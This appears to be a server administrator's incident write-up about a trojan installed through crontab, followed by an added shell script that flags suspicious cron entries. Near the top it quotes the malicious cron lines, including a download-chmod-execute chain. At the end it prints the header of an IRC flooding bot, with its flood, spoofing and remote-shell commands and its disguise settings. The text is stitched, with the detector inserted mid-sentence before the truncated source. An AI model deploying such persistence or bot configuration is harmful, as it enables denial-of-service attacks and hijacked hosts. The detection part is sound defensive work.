A few days ago a trojan was planted on one of our company servers. As soon as it ran it opened a huge number of outbound connections, which brought the whole internal network down. The way it was installed was very simple: the following entries were added to the Linux crond scheduler:
[root@localhost tmp]# crontab -l
* * * * * /root/.zxc >/dev/null 2>&1
@weekly wget -q -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1
The second entry downloads an sh script from the site named in the cron line and runs it; that script in turn fetches the trojan's source code, compiles it locally and executes it, after which the binary keeps sending packets to the outside. Judging from its command set (see the header comment below), the program is an IRC-controlled flooding bot: it joins a channel and waits for flood and shell commands from whoever controls that channel. Interested readers can study the code to see exactly what it does.
The trojan's source code is as follows:
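The cron entries above show the three traits worth hunting for on other hosts: a hidden dotfile executed every minute, a downloader chained straight into chmod +x and an interpreter, and execution out of /tmp. As an added example (not code from the original post, and not part of the trojan), the POSIX shell script below flags crontab lines with any of those traits. The sample crontab is constructed here from the two lines quoted above plus two benign entries; the file locations in scan_system_crontabs are common defaults and are an assumption, not something the post states.

```shell
#!/bin/sh
# Added example, not from the original post: flag crontab lines that match the
# persistence pattern described above. Reads crontab text on stdin and prints
# "<reasons>\t<line>" for every suspicious entry.

flag_cron_lines() {
    while IFS= read -r line; do
        # skip comments, blank lines and environment assignments (SHELL=, PATH=)
        case "$line" in ''|\#*|[A-Za-z_]*=*) continue ;; esac
        reason=""
        # a hidden dotfile in the command path, e.g. /root/.zxc or /tmp/.a
        # (note: "/.." in a path also matches this pattern)
        case "$line" in
            */.[!/]*) reason="hidden-dotfile" ;;
        esac
        # downloader chained into chmod +x or an interpreter in the same entry
        case "$line" in
            *wget*|*curl*)
                case "$line" in
                    *chmod*|*'sh '*|*'bash '*|*'python'*|*'perl '*)
                        reason="${reason:+$reason,}download-and-exec" ;;
                esac ;;
        esac
        # anything executed from a world-writable scratch directory
        case "$line" in
            */tmp/*|*/dev/shm/*|*/var/tmp/*) reason="${reason:+$reason,}tmp-exec" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$reason" "$line"
        fi
    done
}

# Number of flagged lines in the crontab text on stdin.
count_flagged() {
    flag_cron_lines | wc -l | tr -d ' '
}

# Constructed sample: the two entries quoted in the post plus two benign ones.
sample_crontab() {
    printf '%s\n' \
        '# m h dom mon dow command' \
        '0 3 * * * /usr/bin/logrotate /etc/logrotate.conf' \
        '@daily /usr/local/bin/backup.sh >/dev/null 2>&1' \
        '* * * * * /root/.zxc >/dev/null 2>&1' \
        '@weekly wget -q -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1'
}

# Live use: feed every crontab on the box through the filter. The paths are the
# usual locations on RHEL/Debian-style systems (assumption); needs root to read
# the spool directories.
scan_system_crontabs() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        flag_cron_lines < "$f" | sed "s|^|$f: |"
    done
}

# Stand-alone demo on the constructed sample.
sample_crontab | flag_cron_lines
```

Run `scan_system_crontabs` as root on a suspect host; a hidden dotfile that fires every minute is far more telling than the `/tmp` hit alone, since legitimate jobs occasionally write there too. Treat every hit as a lead to verify by hand (what the file is, who owns it, when the crontab was modified), not as proof of compromise.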
/*
* !* SH uname -a *
* There are a number of commands that can be sent to the client: *
* TSUNAMI <target> <secs> = A PUSH+ACK flooder *
* PAN <target> <port> <secs> = A SYN flooder *
* UDP <target> <port> <secs> = An UDP flooder *
* UNKNOWN <target> <secs> = Another non-spoof udp flooder *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from this bot *
* ENABLE = Enables all packeting from this bot *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* Remember, all these commands must be prefixed by a ! and the nickname that *
* you want the command to be sent to (can include wildcards). There are no *
* spaces in between the ! and the nickname, and there are no spaces before *
* the ! *
* *
* - contem on efnet *
*******************************************************************************/
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#define STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "crond" // What you want this to hide as
#define CHAN "#bsd" // Channel to join
#define KEY "routers" // The key of the channel
#define IRCPORT "6667"